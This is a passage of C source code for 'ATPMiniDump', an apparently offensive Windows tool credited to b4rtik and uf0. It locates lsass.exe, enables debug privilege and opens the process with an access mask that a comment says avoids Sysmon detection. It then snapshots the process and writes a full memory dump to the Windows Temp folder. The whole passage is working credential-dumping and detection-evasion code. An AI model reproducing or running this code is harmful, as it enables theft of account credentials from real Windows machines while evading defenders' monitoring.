 24 | 
 25 | 	_NtAllocateVirtualMemory NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)
 26 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
 27 | 	if (NtAllocateVirtualMemory == NULL) {
 28 | 		return FALSE;
 29 | 	}
 30 | 
 31 | 	_NtFreeVirtualMemory NtFreeVirtualMemory = (_NtFreeVirtualMemory)
 32 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtFreeVirtualMemory");
 33 | 	if (NtFreeVirtualMemory == NULL) {
 34 | 		return FALSE;
 35 | 	}
 36 | 
 37 | 	ULONG uReturnLength = 0;
 38 | 	NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength);
 39 | 	if (!status == 0xc0000004) {
 40 | 		return FALSE;
 41 | 	}
 42 | 
 43 | 	LPVOID pBuffer = NULL;
 44 | 	SIZE_T uSize = uReturnLength;
 45 | 	status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
 46 | 	if (status != 0) {
 47 | 		return FALSE;
 48 | 	}
 49 | 
 50 | 	status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength);
 51 | 	if (status != 0) {
 52 | 		return FALSE;
 53 | 	}
 54 | 
 55 | 	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
 56 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
 57 | 	if (RtlEqualUnicodeString == NULL) {
 58 | 		return FALSE;
 59 | 	}
 60 | 
 61 | 	PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
 62 | 	do {
 63 | 		if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) {
 64 | 			pWinVerInfo->hTargetPID = pProcInfo->ProcessId;
 65 | 			break;
 66 | 		}
 67 | 		pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);
 68 | 
 69 | 	} while (pProcInfo);
 70 | 
 71 | 	status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
 72 | 
 73 | 	if (pWinVerInfo->hTargetPID == NULL) {
 74 | 		return FALSE;
 75 | 	}
 76 | 
 77 | 	return TRUE;
 78 | }
 79 | 
 80 | BOOL IsElevated() {
 81 | 	BOOL fRet = FALSE;
 82 | 	HANDLE hToken = NULL;
 83 | 	if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
 84 | 		TOKEN_ELEVATION Elevation = { 0 };
 85 | 		DWORD cbSize = sizeof(TOKEN_ELEVATION);
 86 | 		if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
 87 | 			fRet = Elevation.TokenIsElevated;
 88 | 		}
 89 | 	}
 90 | 	if (hToken) {
 91 | 		CloseHandle(hToken);
 92 | 	}
 93 | 	return fRet;
 94 | }
 95 | 
 96 | BOOL SetDebugPrivilege() {
 97 | 	HANDLE hToken = NULL;
 98 | 	TOKEN_PRIVILEGES TokenPrivileges = { 0 };
 99 | 
100 | 	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
101 | 		return FALSE;
102 | 	}
103 | 
104 | 	TokenPrivileges.PrivilegeCount = 1;
105 | 	TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
106 | 
107 | 	LPWSTR lpwPriv = L"SeDebugPrivilege";
108 | 	if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
109 | 		CloseHandle(hToken);
110 | 		return FALSE;
111 | 	}
112 | 
113 | 	if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
114 | 		CloseHandle(hToken);
115 | 		return FALSE;
116 | 	}
117 | 
118 | 	CloseHandle(hToken);
119 | 	return TRUE;
120 | }
121 | 
122 | int wmain(int argc, wchar_t* argv[]) {
123 | 	wprintf(L"                                  ATPMiniDump						\n");
124 | 	wprintf(L"                               By b4rtik & uf0     2019		    \n\n");
125 | 
126 | 	LPCWSTR lpwProcName = L"lsass.exe";
127 | 
128 | 	if (sizeof(LPVOID) != 8) {
129 | 		wprintf(L"[!] Sorry, this tool only works on a x64 version of Windows.\n");
130 | 		exit(1);
131 | 	}
132 | 
133 | 	if (!IsElevated()) {
134 | 		wprintf(L"[!] You need elevated privileges to run this tool!\n");
135 | 		exit(1);
136 | 	}
137 | 
138 | 	SetDebugPrivilege();
139 | 
140 | 	PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));
141 | 
142 | 	// First set OS Version/Architecture specific values
143 | 	OSVERSIONINFOEXW osInfo;
144 | 	LPWSTR lpOSVersion;
145 | 	osInfo.dwOSVersionInfoSize = sizeof(osInfo);
146 | 
147 | 	_RtlGetVersion RtlGetVersion = (_RtlGetVersion)
148 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
149 | 	if (RtlGetVersion == NULL) {
150 | 		return FALSE;
151 | 	}
152 | 
153 | 	wprintf(L"[1] Checking OS version details:\n");
154 | 	RtlGetVersion(&osInfo);
155 | 	swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
156 | 	pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;
157 | 
158 | 	// Now create os/build specific syscall function pointers.
159 | 	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
160 | 		lpOSVersion = L"10 or Server 2016";
161 | 		wprintf(L"	[+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
162 | 	}
163 | 	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
164 | 		lpOSVersion = L"8.1 or Server 2012 R2";
165 | 		wprintf(L"	[+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber);
166 | 	}
167 | 	else {
168 | 		wprintf(L"	[!] OS Version not supported.\n\n");
169 | 		exit(1);
170 | 	}
171 | 
172 | 	wprintf(L"[2] Checking Process details:\n");
173 | 
174 | 	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
175 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
176 | 	if (RtlInitUnicodeString == NULL) {
177 | 		return FALSE;
178 | 	}
179 | 
180 | 	RtlInitUnicodeString(&pWinVerInfo->ProcName, lpwProcName);
181 | 
182 | 	if (!GetPID(pWinVerInfo)) {
183 | 		wprintf(L"	[!] Enumerating process failed.\n");
184 | 		exit(1);
185 | 	}
186 | 
187 | 	wprintf(L"	[+] Process ID of %wZ is: %lld\n", pWinVerInfo->ProcName, (ULONG64)pWinVerInfo->hTargetPID);
188 | 
189 | 	wprintf(L"	[+] Open a process handle.\n");
190 | 	HANDLE hProcess = NULL;
191 | 	OBJECT_ATTRIBUTES ObjectAttributes;
192 | 	InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
193 | 	CLIENT_ID uPid = { 0 };
194 | 
195 | 	uPid.UniqueProcess = pWinVerInfo->hTargetPID;
196 | 	uPid.UniqueThread = (HANDLE)0;
197 | 
198 | 	// A deviation from the default access right mask to avoid standard Sysmon ID_10 detection - this can be changed to suit one's needs
199 | 	ULONG rights = (PROCESS_CREATE_PROCESS | PROCESS_CREATE_THREAD | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION);
200 | 	printf("Access rights %x\n", rights);
201 | 
202 | 	_ZwOpenProcess ZwOpenProcess = (_ZwOpenProcess)
203 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwOpenProcess");
204 | 	if (ZwOpenProcess == NULL) {
205 | 		return FALSE;
206 | 	}
207 | 	NTSTATUS status = ZwOpenProcess(&hProcess, rights, &ObjectAttributes, &uPid);
208 | 	printf("ZwOpenProcess Handle %d\n", hProcess);
209 | 	if (hProcess == NULL) {
210 | 		wprintf(L"	[!] Failed to get processhandle.\n");
211 | 		exit(1);
212 | 	}
213 | 
214 | 	HANDLE snapshotHandle;
215 | 
216 | 	DWORD flags = (DWORD)PSS_CAPTURE_VA_CLONE
217 | 		| PSS_CAPTURE_HANDLES
218 | 		| PSS_CAPTURE_HANDLE_NAME_INFORMATION
219 | 		| PSS_CAPTURE_HANDLE_BASIC_INFORMATION
220 | 		| PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION
221 | 		| PSS_CAPTURE_HANDLE_TRACE
222 | 		| PSS_CAPTURE_THREADS
223 | 		| PSS_CAPTURE_THREAD_CONTEXT
224 | 		| PSS_CAPTURE_THREAD_CONTEXT_EXTENDED
225 | 		| PSS_CREATE_BREAKAWAY
226 | 		| PSS_CREATE_BREAKAWAY_OPTIONAL
227 | 		| PSS_CREATE_USE_VM_ALLOCATIONS
228 | 		| PSS_CREATE_RELEASE_SECTION;
229 | 
230 | 	DWORD hr = PssCaptureSnapshot(hProcess, flags, CONTEXT_ALL, &snapshotHandle);
231 | 	printf("Snapshot Handle %d\n", hr);
232 | 	MINIDUMP_CALLBACK_INFORMATION CallbackInfo;
233 | 	ZeroMemory(&CallbackInfo, sizeof(MINIDUMP_CALLBACK_INFORMATION));
234 | 	CallbackInfo.CallbackRoutine = ATPMiniDumpWriteDumpCallback;
235 | 	CallbackInfo.CallbackParam = NULL;
236 | 
237 | 	wprintf(L"[3] Create memorydump file:\n");
238 | 
239 | 	WCHAR chDmpFile[MAX_PATH] = L"\\??\\";
240 | 	WCHAR chWinPath[MAX_PATH];
241 | 	GetWindowsDirectory(chWinPath, MAX_PATH);
242 | 	wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath);
243 | 	wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp");
244 | 
245 | 	UNICODE_STRING uFileName;
246 | 	RtlInitUnicodeString(&uFileName, chDmpFile);
247 | 
248 | 	wprintf(L"	[+] Dump %wZ memory to: %wZ\n", pWinVerInfo->ProcName, uFileName);
249 | 
250 | 	HANDLE hDmpFile = NULL;
251 | 	IO_STATUS_BLOCK IoStatusBlock;
252 | 	ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock));
253 | 	OBJECT_ATTRIBUTES FileObjectAttributes;
254 | 	InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
255 | 
256 | 	_NtCreateFile NtCreateFile = (_NtCreateFile)
257 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateFile");
258 | 	if (NtCreateFile == NULL) {
259 | 		return FALSE;
260 | 	}
261 | 
262 | 	_ZwClose ZwClose = (_ZwClose)
263 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwClose");
264 | 	if (ZwClose == NULL) {
265 | 		return FALSE;
266 | 	}
267 | 
268 | 	//  Open input file for writing, overwrite existing file.
269 | 	status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0,
270 | 		FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
271 | 
272 | 	if (hDmpFile == INVALID_HANDLE_VALUE) {
273 | 		wprintf(L"	[!] Failed to create dumpfile.\n");
274 | 		ZwClose(hProcess);
275 | 		exit(1);
276 | 	}
277 | 
278 | 	DWORD dwTargetPID = GetProcessId(hProcess);
279 | 	BOOL Success = MiniDumpWriteDump(snapshotHandle,
280 | 		dwTargetPID,
281 | 		hDmpFile,
282 | 		MiniDumpWithFullMemory,
283 | 		NULL,
284 | 		NULL,
285 | 		&CallbackInfo);
286 | 	if ((!Success))
287 | 	{
288 | 		wprintf(L"	[!] Failed to create minidump, error code: %x\n", GetLastError());
289 | 	}
290 | 	else {
291 | 		wprintf(L"	[+] Dump succesful.\n");
292 | 	}
293 | 
294 | 	ZwClose(hDmpFile);
295 | 	ZwClose(hProcess);
296 | 
297 | 	return 0;
298 | }
299 | 
300 | 
301 | BOOL CALLBACK ATPMiniDumpWriteDumpCallback(
302 | 	__in     PVOID CallbackParam,
303 | 	__in     const PMINIDUMP_CALLBACK_INPUT CallbackInput,
304 | 	__inout  PMINIDUMP_CALLBACK_OUTPUT CallbackOutput
305 | )
306 | {
307 | 	switch (CallbackInput->CallbackType)
308 | 	{
309 | 	case 16: // IsProcessSnapshotCallback
310 | 		CallbackOutput->Status = S_FALSE;
311 | 		break;
312 | 	}
313 | 	return TRUE;
314 | }
315 | 


--------------------------------------------------------------------------------